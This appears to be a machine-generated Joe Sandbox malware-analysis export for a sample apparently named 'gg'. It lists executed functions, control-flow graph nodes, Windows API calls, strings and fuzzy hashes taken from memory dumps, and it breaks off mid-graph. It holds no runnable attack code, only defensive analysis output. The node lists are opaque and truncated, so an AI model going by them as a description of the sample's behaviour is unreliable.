29364->29365 29365->29357 29369 30eae31 29368->29369 29370 30eae64 29369->29370 29374 30eb0b8 LoadLibraryExW 29369->29374 29375 30eb0c8 LoadLibraryExW 29369->29375 29370->29357 29371 30eae5c 29371->29370 29372 30eb068 GetModuleHandleW 29371->29372 29373 30eb095 29372->29373 29373->29357 29374->29371 29375->29371 29377 30eb0bc 29376->29377 29379 30eb101 29377->29379 29384 30ea870 29377->29384 29379->29363 29381 30eb0c9 29380->29381 29382 30eb101 29381->29382 29383 30ea870 LoadLibraryExW 29381->29383 29382->29363 29383->29382 29385 30eb2a8 LoadLibraryExW 29384->29385 29387 30eb321 29385->29387 29387->29379 29388 30ed0b8 29389 30ed0bd 29388->29389 29393 30ed289 29389->29393 29397 30ed298 29389->29397 29390 30ed1eb 29394 30ed298 29393->29394 29401 30ec9a0 29394->29401 29398 30ed29d 29397->29398 29399 30ec9a0 DuplicateHandle 29398->29399 29400 30ed2c6 29399->29400 29400->29390 29402 30ed300 DuplicateHandle 29401->29402 29404 30ed2c6 29402->29404 29404->29390 29405 65474a8 29406 65474ad 29405->29406 29408 65474c3 29406->29408 29409 6546e2c 29406->29409 29410 65474f8 OleInitialize 29409->29410 29411 654755c 29410->29411 29411->29408

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 0654A898 Relevance: 8.1, APIs: 1, Strings: 3, Instructions: 1113COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 488 654a898-654a8fb 492 654a902-654a99e 488->492 493 654a8fd 488->493 496 654a9f0-654aa2b 492->496 497 654a9a0-654a9ea 492->497 493->492 502 654bd7c-654bd95 496->502 497->496 505 654aa30-654ab86 502->505 506 654bd9b-654bdc1 502->506 740 654ab8c call 654be78 505->740 741 654ab8c call 654be68 505->741 509 654bdd0 506->509 510 654bdc3-654bdcf 506->510 513 654bdd1 509->513 510->509 513->513 522 654ab92-654abc0 524 654bd34-654bd4e 522->524 526 654bd54-654bd78 524->526 527 654abc5-654ad09 call 654343c call 654344c 524->527 526->502 545 654ad3c-654ad83 527->545 546 654ad0b-654ad37 527->546 552 654ad85-654ada7 545->552 553 654ada9-654adb8 545->553 549 654adcb-654af83 546->549 574 654afd5-654afe0 549->574 575 654af85-654afcf 549->575 557 654adbe-654adca 552->557 553->557 557->549 736 654afe6 call 654c9b0 574->736 737 654afe6 call 654c9a0 574->737 575->574 576 654afec-654b050 582 654b0a2-654b0ad 576->582 583 654b052-654b09c 576->583 732 654b0b3 call 654c9b0 582->732 733 654b0b3 call 654c9a0 582->733 583->582 585 654b0b9-654b11c 590 654b16e-654b179 585->590 591 654b11e-654b168 585->591 744 654b17f call 654c9b0 590->744 745 654b17f call 654c9a0 590->745 591->590 593 654b185-654b1be 596 654b1c4-654b227 593->596 597 654b637-654b6be 593->597 605 654b22e-654b280 LdrInitializeThunk call 654a7f4 596->605 606 654b229 596->606 608 654b6c0-654b716 597->608 609 654b71c-654b727 597->609 617 654b285-654b3ad call 6549508 call 654a2b0 call 65470a4 call 65470b4 605->617 606->605 608->609 746 654b72d call 654c9b0 609->746 747 654b72d call 654c9a0 609->747 611 654b733-654b7c0 627 654b7c2-654b818 611->627 628 654b81e-654b829 611->628 649 654b3b3-654b405 617->649 650 654b61a-654b636 617->650 627->628 742 654b82f call 654c9b0 628->742 743 654b82f call 654c9a0 628->743 630 654b835-654b8ad 642 654b8af-654b905 630->642 643 654b90b-654b916 630->643 642->643 738 654b91c call 654c9b0 643->738 739 654b91c call 654c9a0 643->739 646 654b922-654b98e 661 654b9e0-654b9eb 646->661 662 654b990-654b9da 646->662 659 654b457-654b4d2 649->659 660 654b407-654b451 649->660 650->597 675 654b524-654b59e 659->675 676 654b4d4-654b51e 659->676 660->659 734 654b9f1 call 654c9b0 661->734 735 654b9f1 call 654c9a0 661->735 662->661 664 654b9f7-654ba3c 677 654bb72-654bcf3 664->677 678 654ba42-654bb71 664->678 692 654b5f0-654b619 675->692 693 654b5a0-654b5ea 675->693 676->675 728 654bcfb-654bd1b 677->728 678->677 692->650 693->692 729 654bd33 728->729 730 654bd1d-654bd32 728->730 729->524 730->729 732->585 733->585 734->664 735->664 736->576 737->576 738->646 739->646 740->522 741->522 742->630 743->630 744->593 745->593 746->611 747->611
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: C*${*$^Wl^
                                                                                                                                                                                                                                                  • API String ID: 0-3592993007
                                                                                                                                                                                                                                                  • Opcode ID: 6e63f2c700dcb8f5b0193d863e31a7a99429dd49706037a71370b04048731ee7
                                                                                                                                                                                                                                                  • Instruction ID: c3b9bf28719bcbc8b344abf16a16270bb46258d29fe737bdfb068b997e01ff96
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e63f2c700dcb8f5b0193d863e31a7a99429dd49706037a71370b04048731ee7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C29F74E012298FDBA4EF28D898B9DB7B1FB49304F1081E9D809A7354DB35AE85CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0654CB28 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 999 654cb28-654cb5a 1000 654cb61-654cc2d 999->1000 1001 654cb5c 999->1001 1006 654cc42 1000->1006 1007 654cc2f-654cc3d 1000->1007 1001->1000 1070 654cc48 call 654d8de 1006->1070 1071 654cc48 call 654d96e 1006->1071 1072 654cc48 call 654d898 1006->1072 1073 654cc48 call 654d7e9 1006->1073 1008 654d0f0-654d0fd 1007->1008 1009 654cc4e-654ccfe 1017 654d07f-654d0a9 1009->1017 1019 654cd03-654cf19 1017->1019 1020 654d0af-654d0ee 1017->1020 1047 654cf25-654cf6f 1019->1047 1020->1008 1050 654cf77-654cf79 1047->1050 1051 654cf71 1047->1051 1054 654cf80-654cf87 1050->1054 1052 654cf73-654cf75 1051->1052 1053 654cf7b 1051->1053 1052->1050 1052->1053 1053->1054 1055 654d001-654d027 1054->1055 1056 654cf89-654d000 1054->1056 1059 654d034-654d040 1055->1059 1060 654d029-654d032 1055->1060 1056->1055 1061 654d046-654d065 1059->1061 1060->1061 1065 654d067-654d07a 1061->1065 1066 654d07b-654d07c 1061->1066 1065->1066 1066->1017 1070->1009 1071->1009 1072->1009 1073->1009
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$1
                                                                                                                                                                                                                                                  • API String ID: 0-1839485796
                                                                                                                                                                                                                                                  • Opcode ID: 960c0b638a2fd7403ccdba69fcd8e1a1933f1754913193ad77192b2f7939097b
                                                                                                                                                                                                                                                  • Instruction ID: 55296d0ae391355fc1ed04658b84c309c2cc2a7fb1e896a20696d839ac443723
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 960c0b638a2fd7403ccdba69fcd8e1a1933f1754913193ad77192b2f7939097b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8F1FE74E01228CFDB68DF64C884BADBBB2BF89305F1095E9D50AAB254DB315E85CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065477A0 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: cce2fd8ddf9deea90ad0b40b9944082bbb6f8b52bcf98b68a6de424d14020346
                                                                                                                                                                                                                                                  • Instruction ID: f628125b1ade487e35177d04921778d0bf5a47826681910642de98a6fd6e9604
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cce2fd8ddf9deea90ad0b40b9944082bbb6f8b52bcf98b68a6de424d14020346
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C219F74E012189FCB48EFA9E884ADDBBB6FB8D314F10956AE415B7360DB305845CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065491A0 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: S2
                                                                                                                                                                                                                                                  • API String ID: 0-3178285963
                                                                                                                                                                                                                                                  • Opcode ID: 42bc1a2a965fb5be3cfa5516d4f421fe7e534391cf915b8c6b69cc66c35d56a6
                                                                                                                                                                                                                                                  • Instruction ID: 59bb46e47a3e0053b9404f9f996f2b1eea6bc73ad4da13fefe1f32014e2552a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42bc1a2a965fb5be3cfa5516d4f421fe7e534391cf915b8c6b69cc66c35d56a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08910374E01219CFDBA4EFA8D984B9DBBB2FF49304F1091A9D549A7350DB306A85CF41
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06548768 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q
                                                                                                                                                                                                                                                  • API String ID: 0-388095546
                                                                                                                                                                                                                                                  • Opcode ID: 1fca192d4c3648b4ca3833e900ea0ca55f91923d9c25d7f50360537b706d1259
                                                                                                                                                                                                                                                  • Instruction ID: f85a571b4e7bf3b3089a5618eac8314315bf636530d1b4796b89288e903d1891
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fca192d4c3648b4ca3833e900ea0ca55f91923d9c25d7f50360537b706d1259
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64711234E01218CFDB58EFA9D884AADBBB2FF89304F209569D415BB354DB359842CF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06549508 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 28fe92ff379e677843918305482b5337896bf4ea1f736901b77ddd058281de75
                                                                                                                                                                                                                                                  • Instruction ID: 8fb1181580f7decea213632a7183c077ee1b5cd7f48ece12228c293e2b5d4021
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28fe92ff379e677843918305482b5337896bf4ea1f736901b77ddd058281de75
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1228E74D00229CFDBA5DF69C894BDABBB1BF89304F1085EAD549A7250EB315E85CF80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065A0CF0 Relevance: 20.6, Strings: 16, Instructions: 615COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 294 65a0cf0-65a0d35 299 65a0d3b-65a0d3d 294->299 300 65a0e67-65a0e7a 294->300 301 65a0d40-65a0d4f 299->301 304 65a0f70-65a0f7b 300->304 305 65a0e80-65a0e8f 300->305 307 65a0e07-65a0e0b 301->307 308 65a0d55-65a0d87 301->308 306 65a0f83-65a0f8c 304->306 314 65a0f3b-65a0f3f 305->314 315 65a0e95-65a0ebb 305->315 309 65a0e1a 307->309 310 65a0e0d-65a0e18 307->310 341 65a0d89-65a0d8e 308->341 342 65a0d90-65a0d97 308->342 312 65a0e1f-65a0e22 309->312 310->312 312->306 319 65a0e28-65a0e2c 312->319 316 65a0f4e 314->316 317 65a0f41-65a0f4c 314->317 343 65a0ebd-65a0ec2 315->343 344 65a0ec4-65a0ecb 315->344 320 65a0f50-65a0f52 316->320 317->320 321 65a0e3b 319->321 322 65a0e2e-65a0e39 319->322 327 65a0fa3-65a101d 320->327 328 65a0f54-65a0f5e 320->328 325 65a0e3d-65a0e3f 321->325 322->325 329 65a0f8f-65a0f9c 325->329 330 65a0e45-65a0e4f 325->330 376 65a1023-65a1025 327->376 377 65a10f1-65a1104 327->377 340 65a0f61-65a0f6a 328->340 329->327 345 65a0e52-65a0e5c 330->345 340->304 340->305 347 65a0dfb-65a0e05 341->347 349 65a0d99-65a0dba 342->349 350 65a0dbc-65a0de0 342->350 348 65a0f2f-65a0f39 343->348 351 65a0ecd-65a0eee 344->351 352 65a0ef0-65a0f14 344->352 345->301 353 65a0e62 345->353 347->345 348->340 349->347 367 65a0df8 350->367 368 65a0de2-65a0de8 350->368 351->348 369 65a0f2c 352->369 370 65a0f16-65a0f1c 352->370 353->306 367->347 372 65a0dea 368->372 373 65a0dec-65a0dee 368->373 369->348 374 65a0f1e 370->374 375 65a0f20-65a0f22 370->375 372->367 373->367 374->369 375->369 378 65a1028-65a1037 376->378 381 65a110a-65a1119 377->381 382 65a119c-65a11a7 377->382 384 65a1039-65a1045 378->384 385 65a1091-65a1095 378->385 391 65a111b-65a1144 381->391 392 65a1167-65a116b 381->392 383 65a11af-65a11b8 382->383 400 65a104f-65a1066 384->400 386 65a1097-65a10a2 385->386 387 65a10a4 385->387 389 65a10a9-65a10ac 386->389 387->389 389->383 396 65a10b2-65a10b6 389->396 415 65a115c-65a1165 391->415 416 65a1146-65a114c 391->416 394 65a117a 392->394 395 65a116d-65a1178 392->395 397 65a117c-65a117e 394->397 395->397 398 65a10b8-65a10c3 396->398 399 65a10c5 396->399 403 65a11cf-65a1217 397->403 404 65a1180-65a118a 397->404 405 65a10c7-65a10c9 398->405 399->405 409 65a106c-65a106e 400->409 430 65a1219-65a121f 403->430 431 65a122f-65a1251 403->431 421 65a118d-65a1196 404->421 406 65a11bb-65a11c8 405->406 407 65a10cf-65a10d9 405->407 406->403 425 65a10dc-65a10e6 407->425 413 65a1070-65a1076 409->413 414 65a1086-65a108f 409->414 422 65a107a-65a107c 413->422 423 65a1078 413->423 414->425 415->421 417 65a114e 416->417 418 65a1150-65a1152 416->418 417->415 418->415 421->381 421->382 422->414 423->414 425->378 428 65a10ec 425->428 428->383 432 65a1223-65a1225 430->432 433 65a1221 430->433 436 65a1254-65a1258 431->436 432->431 433->431 437 65a125a-65a125f 436->437 438 65a1261-65a1266 436->438 439 65a126c-65a126f 437->439 438->439 440 65a1460-65a1468 439->440 441 65a1275-65a128a 439->441 441->436 443 65a128c 441->443 444 65a1348-65a136d 443->444 445 65a1293-65a12b8 443->445 446 65a1400 443->446 456 65a136f-65a1371 444->456 457 65a1373-65a1377 444->457 458 65a12ba-65a12bc 445->458 459 65a12be-65a12c2 445->459 448 65a140a-65a1421 446->448 452 65a1427-65a1441 448->452 460 65a144b-65a144e 452->460 461 65a13d5-65a13fb 456->461 462 65a1398-65a13bb 457->462 463 65a1379-65a1396 457->463 464 65a1320-65a1343 458->464 465 65a12e3-65a1306 459->465 466 65a12c4-65a12e1 459->466 468 65a1456-65a145b 460->468 461->436 480 65a13bd-65a13c3 462->480 481 65a13d3 462->481 463->461 464->436 482 65a1308-65a130e 465->482 483 65a131e 465->483 466->464 468->436 484 65a13c7-65a13c9 480->484 485 65a13c5 480->485 481->461 486 65a1312-65a1314 482->486 487 65a1310 482->487 483->464 484->481 485->481 486->483 487->483
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2449488485
                                                                                                                                                                                                                                                  • Opcode ID: 61507ec7b4945aab9d6c1bebf81a5bc96eb2051174b9a4829e4a81bc7ea27890
                                                                                                                                                                                                                                                  • Instruction ID: 9fac94ba72b90e23c669df26a46a3ea038201d46b9277b76788130eeeb1f7a72
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61507ec7b4945aab9d6c1bebf81a5bc96eb2051174b9a4829e4a81bc7ea27890
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8822AF30B107059FDB549B69C854A6EBBF6FF89204F24885AE906CB3A2CF74DC45CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065A14EA Relevance: 7.8, Strings: 6, Instructions: 337COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 748 65a14ea-65a14ec 749 65a14f6 748->749 750 65a1500-65a1517 749->750 751 65a151d-65a151f 750->751 752 65a1521-65a1527 751->752 753 65a1537-65a1559 751->753 754 65a152b-65a152d 752->754 755 65a1529 752->755 758 65a15a0-65a15a7 753->758 754->753 755->753 759 65a14d9-65a14e8 758->759 760 65a15ad-65a16af 758->760 759->748 763 65a155b-65a155f 759->763 764 65a156e 763->764 765 65a1561-65a156c 763->765 767 65a1573-65a1576 764->767 765->767 767->760 770 65a1578-65a157c 767->770 771 65a158b 770->771 772 65a157e-65a1589 770->772 773 65a158d-65a158f 771->773 772->773 775 65a16b2-65a170f 773->775 776 65a1595-65a159f 773->776 783 65a1711-65a1717 775->783 784 65a1727-65a1749 775->784 776->758 785 65a171b-65a171d 783->785 786 65a1719 783->786 789 65a174c-65a1750 784->789 785->784 786->784 790 65a1759-65a175e 789->790 791 65a1752-65a1757 789->791 792 65a1764-65a1767 790->792 791->792 793 65a176d-65a1782 792->793 794 65a1a27-65a1a2f 792->794 793->789 796 65a1784 793->796 797 65a178b-65a183b 796->797 798 65a18f8-65a1925 796->798 799 65a196f-65a1994 796->799 800 65a1840-65a18f3 796->800 797->789 818 65a192b-65a1935 798->818 819 65a1a9e-65a1add 798->819 814 65a199a-65a199e 799->814 815 65a1996-65a1998 799->815 800->789 821 65a19bf-65a19e2 814->821 822 65a19a0-65a19bd 814->822 820 65a19fc-65a1a22 815->820 825 65a193b-65a196a 818->825 826 65a1a68-65a1a97 818->826 820->789 843 65a19fa 821->843 844 65a19e4-65a19ea 821->844 822->820 825->789 826->819 843->820 845 65a19ee-65a19f0 844->845 846 65a19ec 844->846 845->843 846->843
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2392861976
                                                                                                                                                                                                                                                  • Opcode ID: c59889d01ad5ec15d7737db7ffc8401e1fd313f37eecb92ea15a80523b23f4fe
                                                                                                                                                                                                                                                  • Instruction ID: 40f342ffa7b4dc52c67dcae65486a51d2932a2095ee512dd06366e58ff9b2c2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c59889d01ad5ec15d7737db7ffc8401e1fd313f37eecb92ea15a80523b23f4fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC19D34B407049FDB649B68C854A2E77E6FF89704F208869E6038B7A6CF75DC46CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 030EAE30 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1216 30eae30-30eae3f 1219 30eae6b-30eae6f 1216->1219 1220 30eae41-30eae4e call 30e9838 1216->1220 1222 30eae83-30eaec4 1219->1222 1223 30eae71-30eae7b 1219->1223 1226 30eae64 1220->1226 1227 30eae50 1220->1227 1229 30eaec6-30eaece 1222->1229 1230 30eaed1-30eaedf 1222->1230 1223->1222 1226->1219 1281 30eae56 call 30eb0b8 1227->1281 1282 30eae56 call 30eb0c8 1227->1282 1229->1230 1231 30eaf03-30eaf05 1230->1231 1232 30eaee1-30eaee6 1230->1232 1236 30eaf08-30eaf0f 1231->1236 1234 30eaee8-30eaeef call 30ea814 1232->1234 1235 30eaef1 1232->1235 1233 30eae5c-30eae5e 1233->1226 1237 30eafa0-30eafb7 1233->1237 1238 30eaef3-30eaf01 1234->1238 1235->1238 1240 30eaf1c-30eaf23 1236->1240 1241 30eaf11-30eaf19 1236->1241 1251 30eafb9-30eb018 1237->1251 1238->1236 1244 30eaf25-30eaf2d 1240->1244 1245 30eaf30-30eaf39 call 30ea824 1240->1245 1241->1240 1244->1245 1249 30eaf3b-30eaf43 1245->1249 1250 30eaf46-30eaf4b 1245->1250 1249->1250 1252 30eaf4d-30eaf54 1250->1252 1253 30eaf69-30eaf76 1250->1253 1269 30eb01a 1251->1269 1252->1253 1255 30eaf56-30eaf66 call 30ea834 call 30ea844 1252->1255 1260 30eaf78-30eaf96 1253->1260 1261 30eaf99-30eaf9f 1253->1261 1255->1253 1260->1261 1270 30eb01c 1269->1270 1271 30eb021-30eb024 1269->1271 1273 30eb01e 1270->1273 1274 30eb048-30eb060 1270->1274 1272 30eb025-30eb046 1271->1272 1272->1274 1273->1272 1275 30eb020 1273->1275 1276 30eb068-30eb093 GetModuleHandleW 1274->1276 1277 30eb062-30eb065 1274->1277 1275->1271 1278 30eb09c-30eb0b0 1276->1278 1279 30eb095-30eb09b 1276->1279 1277->1276 1279->1278 1281->1233 1282->1233
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030EB086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  • Opcode ID: ae919f0829e543232a7c8bdd9777853071c5974830e47f626b07efe770f0eb48
                                                                                                                                                                                                                                                  • Instruction ID: c2c4c1d72e011542c48e37b470a5fc93122935996450e6a7695bc443374e9c93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae919f0829e543232a7c8bdd9777853071c5974830e47f626b07efe770f0eb48
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA8145B0B01B058FDB64DF69D14479ABBF5FF88304F04896ED09A9BA50D735E84ACB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065A05F8 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1283 65a05f8-65a05f9 1284 65a05fb-65a060d 1283->1284 1285 65a05e3-65a05e5 1283->1285 1286 65a0613-65a0617 1284->1286 1287 65a0b55-65a0b84 1284->1287 1288 65a00a8-65a00b5 1285->1288 1289 65a061d-65a0627 1286->1289 1290 65a0bc1-65a0c9e 1286->1290 1291 65a0b8b-65a0bba 1287->1291 1295 65a06da-65a06e4 1288->1295 1296 65a00bb-65a00d0 1288->1296 1289->1291 1292 65a062d-65a065d 1289->1292 1291->1290 1292->1287 1292->1288 1296->1288 1305 65a00d2 1296->1305 1308 65a031a-65a033d 1305->1308 1309 65a040a-65a042d 1305->1309 1310 65a00d9-65a00fc 1305->1310 1311 65a014e 1305->1311 1312 65a0392-65a03b5 1305->1312 1313 65a0482-65a04a5 1305->1313 1314 65a01c1 1305->1314 1315 65a02a7 1305->1315 1316 65a0234-65a0262 1305->1316 1368 65a0789-65a07b8 1308->1368 1369 65a0343-65a0347 1308->1369 1370 65a08cd-65a08fc 1309->1370 1371 65a0433-65a0437 1309->1371 1372 65a0102-65a0106 1310->1372 1373 65a06e7-65a0716 1310->1373 1325 65a0158-65a0174 1311->1325 1361 65a082b-65a085a 1312->1361 1362 65a03bb-65a03bf 1312->1362 1363 65a04ab-65a04af 1313->1363 1364 65a096f-65a099e 1313->1364 1321 65a01cb-65a01e7 1314->1321 1328 65a02b1-65a02cd 1315->1328 1343 65a027a-65a02a2 1316->1343 1344 65a0264-65a026a 1316->1344 1332 65a01ed-65a01ef 1321->1332 1336 65a017a-65a017c 1325->1336 1329 65a02d3-65a02d5 1328->1329 1339 65a02ed-65a0315 1329->1339 1340 65a02d7-65a02dd 1329->1340 1341 65a01f1-65a01f7 1332->1341 1342 65a0207-65a022f 1332->1342 1345 65a017e-65a0184 1336->1345 1346 65a0194-65a01bc 1336->1346 1339->1288 1347 65a02df 1340->1347 1348 65a02e1-65a02e3 1340->1348 1349 65a01fb-65a01fd 1341->1349 1350 65a01f9 1341->1350 1342->1288 1343->1288 1354 65a026e-65a0270 1344->1354 1355 65a026c 1344->1355 1357 65a0188-65a018a 1345->1357 1358 65a0186 1345->1358 1346->1288 1347->1339 1348->1339 1349->1342 1350->1342 1354->1343 1355->1343 1357->1346 1358->1346 1386 65a0861-65a0890 1361->1386 1375 